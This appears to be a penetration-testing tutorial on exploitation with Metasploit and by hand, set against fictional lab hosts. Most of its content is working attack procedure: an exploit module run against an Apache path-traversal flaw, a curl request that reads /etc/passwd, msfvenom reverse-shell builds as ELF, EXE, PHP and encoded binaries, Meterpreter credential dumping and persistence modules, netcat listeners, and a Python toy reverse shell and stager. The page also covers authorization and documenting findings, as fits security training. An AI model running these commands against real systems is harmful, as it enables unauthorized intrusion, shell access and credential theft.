Advanced Pentest & Offensive

Exploitation with Metasploit and manual — modules, payloads, shells

Exploitation is the moment when an identified vulnerability is used to gain access. It requires precision: the wrong exploit, or the right exploit against an unconfirmed version, can crash a production service. Never run exploits against systems without written authorization and an agreed scope.

Metasploit Framework — basic structure

# Start the console
msfconsole

# Search for modules by CVE, name, platform or reliability rank
search cve:2021-44228          # Log4Shell
search type:exploit name:smb   # SMB exploits
search platform:linux rank:excellent

# Select a module (one module is active at a time; a second `use` replaces the first)
use exploit/multi/handler                      # generic listener for shells started by other means, not an exploit
use exploit/windows/smb/ms17_010_eternalblue   # a remote exploit module

show options        # view required parameters (RHOSTS, LHOST, ...)
show payloads       # view payloads compatible with the active module

Anatomy of a Metasploit module

Components:
  Exploit  → code that triggers the vulnerability
  Payload  → code executed after exploitation (shell, meterpreter)
  Encoder  → re-encodes the payload to avoid bad characters (e.g. null bytes) that would break the exploit;
             changes the byte pattern but gives little real AV evasion against current engines
  NOP sled → padding so the jump into the payload does not have to land on an exact address

Payload types:
  singles    → self-contained, no staging dependency
  stagers    → small code that connects back and downloads the full stage from the handler
  stages     → full payload (meterpreter, VNC) delivered over the stager's connection

Notation (slash vs underscore after the architecture):
  windows/x64/meterpreter/reverse_tcp   → staged: stager + stage, needs a handler that can serve the stage
  windows/x64/shell_reverse_tcp         → single: the whole shell is in the payload, a plain listener is enough

Example: web vulnerability exploitation (lab environment)

# Scenario: Apache 2.4.49 with CVE-2021-41773 (path traversal; RCE only when mod_cgi is enabled)
# The same module also covers 2.4.50, whose incomplete fix became CVE-2021-42013
# Fictional lab host: 192.168.1.50

use exploit/multi/http/apache_normalize_path_rce
set RHOSTS 192.168.1.50
set RPORT 80
set LHOST 192.168.1.100    # your attack machine, as reachable from the target
set LPORT 4444
set PAYLOAD linux/x64/meterpreter/reverse_tcp   # must fit the selected target; `show targets` lists them
run                        # where a module supports `check`, confirm the vulnerability with it before `run`

Meterpreter — advanced shell

# Basic Meterpreter commands
sysinfo              # OS, hostname, architecture
getuid               # current user
ps                   # running processes
upload file.txt      # send file to target
download /etc/passwd # retrieve file
shell                # open native OS shell

# Privilege escalation
getsystem            # attempt to elevate to SYSTEM (Windows only)
run post/multi/recon/local_exploit_suggester  # lists local exploits matching the host's OS and patch level

# Persistence (only if the rules of engagement allow it; record what you install and remove it at the end)
run post/windows/manage/persistence_exe
run post/linux/manage/cron_persistence

# Credential dumping (Windows; hashdump needs SYSTEM privileges)
hashdump             # SAM hashes
run post/windows/gather/credentials/credential_collector

Manual exploits — without Metasploit

Alternative tools and public PoCs:

# Search for exploits by product and version
searchsploit apache 2.4.49
searchsploit -x 50383        # read the PoC (EDB-ID 50383, linux/webapps/50383.sh) before using it

# Copy to working directory
searchsploit -m 50383

# Path traversal via curl (CVE-2021-41773)
# Lab environment: 192.168.1.50
# --path-as-is keeps curl from normalising ../ sequences on the client side
curl -s --path-as-is "http://192.168.1.50/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
# Apache 2.4.50 needs the double-encoded form .%%32%65 (CVE-2021-42013). A hit needs enough
# ../ steps to reach / from the cgi-bin directory and a config that allows access outside the docroot

# Manual SQLi follows the same by-hand pattern (authorized environment only):
# identify the injection point, confirm it with a boolean- or time-based probe,
# then extract data via UNION SELECT or an error-based technique

Payload generation with msfvenom

# Linux reverse shell ELF (single payload: the binary is the whole shell)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf

# Windows reverse shell EXE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe

# PHP payload for a web shell (place it where the server executes PHP, then request it)
msfvenom -p php/reverse_php LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php

# With encoder: removes bad characters and changes the byte pattern, but behaviour-based
# AV/EDR still flags a stock Meterpreter; do not rely on it for evasion
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -e x64/xor -i 5 \
  -f exe -o payload_encoded.exe

Listener to catch the shell

# Via Metasploit (recommended: required for staged payloads, because the handler has to
# send the stage; PAYLOAD and LPORT must match exactly what msfvenom was given)
use exploit/multi/handler
set PAYLOAD linux/x64/shell_reverse_tcp
set LHOST 0.0.0.0       # bind address only; the payload itself was built with the reachable IP
set LPORT 4444
run -j                  # run in background; `sessions -i <id>` to interact

# Via netcat (simple; enough for single payloads such as shell_reverse_tcp, useless for meterpreter/...)
nc -lvnp 4444
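The difference between a single and a staged connect-back, and why a bare listener catches one but not the other, as an added runnable model covering both the payload-notation section and the listener section above. This is constructed example code, not from the page and not from Metasploit: everything runs on 127.0.0.1, a thread stands in for the victim, the "stage" is a few lines of Python source executed in place of Meterpreter's machine code, and the 4-byte little-endian length prefix loosely follows the reverse_tcp stagers' scheme. Function names and the toy stage are assumptions.

```python
"""Toy model of how a reverse-TCP payload reaches a listener, for both the
'single' and the 'staged' form. Constructed example, not Metasploit code; it
runs entirely on 127.0.0.1 and stands in for the victim with a thread."""
import socket
import struct
import subprocess
import threading


def _listener() -> socket.socket:
    """Bind an ephemeral port on loopback; plays the role of LHOST:LPORT."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise if the peer hangs up first."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before sending %d bytes" % n)
        buf += chunk
    return buf


# --- single (shell_reverse_tcp): the connect-back already is the shell --------
def single_payload(lhost: str, lport: int) -> None:
    """Victim side. A real single execs /bin/sh on the socket; this toy runs one
    command per line it receives and writes the output back."""
    with socket.create_connection((lhost, lport)) as s:
        while True:
            line = s.recv(4096)
            if not line or line.strip() == b"exit":
                return
            done = subprocess.run(line.decode().strip(), shell=True, capture_output=True)
            s.sendall((done.stdout + done.stderr) or b"\n")


def catch_single(command: bytes) -> bytes:
    """Attacker side, i.e. what `nc -lvnp LPORT` gives you: accept the connection,
    write one command, read its output."""
    srv = _listener()
    port = srv.getsockname()[1]
    victim = threading.Thread(target=single_payload, args=("127.0.0.1", port))
    victim.start()
    conn, _ = srv.accept()
    conn.sendall(command + b"\n")
    output = conn.recv(4096)
    conn.sendall(b"exit\n")
    victim.join()
    conn.close()
    srv.close()
    return output


# --- staged (meterpreter/reverse_tcp): the stager fetches the stage first -----
def stager(lhost: str, lport: int) -> str:
    """Victim side. The real stager reads a 4-byte little-endian length, then
    that many bytes of code, and jumps into them; here the stage is Python
    source and is exec'd instead."""
    with socket.create_connection((lhost, lport)) as s:
        (length,) = struct.unpack("<I", _recv_exact(s, 4))
        stage = _recv_exact(s, length)
    ns: dict = {}
    exec(stage.decode(), ns)
    return ns["STAGE_RESULT"]


def catch_staged(stage: bytes, serve_stage: bool) -> str:
    """Attacker side. serve_stage=True behaves like exploit/multi/handler set to
    the same staged payload; False behaves like netcat, which accepts the
    connection but has no stage to send."""
    srv = _listener()
    port = srv.getsockname()[1]
    result = {}

    def victim() -> None:
        try:
            result["value"] = stager("127.0.0.1", port)
        except ConnectionError as exc:
            result["value"] = "stager failed: " + str(exc)

    t = threading.Thread(target=victim)
    t.start()
    conn, _ = srv.accept()
    if serve_stage:
        conn.sendall(struct.pack("<I", len(stage)) + stage)
    conn.close()
    t.join()
    srv.close()
    return result["value"]


# Constructed toy stage standing in for the real Meterpreter stage.
TOY_STAGE = b"import platform\nSTAGE_RESULT = 'sysinfo: ' + platform.system()\n"

if __name__ == "__main__":
    print(catch_single(b"echo pwned"))
    print(catch_staged(TOY_STAGE, serve_stage=True))
    print(catch_staged(TOY_STAGE, serve_stage=False))
```

The third call is the netcat case: the stager connects, waits for a length it never receives, and dies when the listener closes, which is exactly what happens when a `meterpreter/reverse_tcp` payload calls back to `nc -lvnp`. The single payload works with either listener because nothing has to be sent before the shell is usable.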

Documenting exploitation

For each executed exploit, record:
  1. CVE / vulnerability exploited
  2. Exact command used
  3. Result: access obtained? what privilege level?
  4. Screenshot or session log
  5. Timestamp
  6. Demonstrated impact (what was possible with the access)

This documentation is the foundation of the pentest report.
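One way to keep those six items as a structured, append-only log instead of loose notes, as an added example that is not from the page or any tool: each exploitation step becomes one JSON line with a UTC timestamp and the SHA-256 of its evidence file, so a session log cannot be swapped after the fact, and incomplete entries are refused. The file names, field names and the sample session log are assumptions constructed for the example.

```python
"""Append-only evidence log for exploitation steps, one JSON object per line.
Added example, not part of the page or any tool; file and field names are assumptions."""
import hashlib
import json
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# The six items the page asks for; "evidence" is the screenshot or session log path.
FIELDS = ("cve", "command", "result", "privilege", "evidence", "impact")


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def record_exploit(log: Path, cve: str, command: str, result: str, privilege: str,
                   evidence: Path, impact: str) -> dict:
    """Write one record. Refuses incomplete entries and ties the record to the
    evidence file by hash so the artifact cannot be replaced later unnoticed."""
    entry = {"cve": cve, "command": command, "result": result,
             "privilege": privilege, "evidence": str(evidence), "impact": impact}
    missing = [k for k in FIELDS if not entry[k]]
    if missing:
        raise ValueError("incomplete record, missing: " + ", ".join(missing))
    if not evidence.is_file():
        raise FileNotFoundError("evidence file not found: %s" % evidence)
    entry["evidence_sha256"] = sha256_file(evidence)
    entry["timestamp"] = datetime.now(timezone.utc).isoformat(timespec="seconds")
    with log.open("a", encoding="utf-8") as f:
        f.write(json.dumps(entry, sort_keys=True) + "\n")
    return entry


def load_records(log: Path) -> list:
    """Read the log back, one dict per line, for the report."""
    lines = log.read_text(encoding="utf-8").splitlines()
    return [json.loads(line) for line in lines if line.strip()]


def demo() -> dict:
    """Run on constructed data in a temporary directory and return what happened."""
    with tempfile.TemporaryDirectory() as d:
        base = Path(d)
        evidence = base / "session-192.168.1.50.log"      # constructed session log
        evidence.write_bytes(b"meterpreter > getuid\nServer username: www-data\n")
        log = base / "exploitation.jsonl"
        entry = record_exploit(
            log, "CVE-2021-41773",
            "use exploit/multi/http/apache_normalize_path_rce; set RHOSTS 192.168.1.50; run",
            "meterpreter session 1 opened", "www-data", evidence,
            "read /etc/passwd; command execution as the web server user")
        try:
            record_exploit(log, "CVE-2021-41773", "", "", "", evidence, "")
            rejected = False
        except ValueError:
            rejected = True
        return {"entry": entry, "records": load_records(log),
                "expected_sha256": hashlib.sha256(evidence.read_bytes()).hexdigest(),
                "rejected_incomplete": rejected}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Hashing the evidence at recording time is what lets the final report say which session log backs which finding; keep the log itself under version control or on write-once storage so the timestamps are believable.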

Exploiting is the smallest part of the work — documenting correctly is what turns access into value for the client.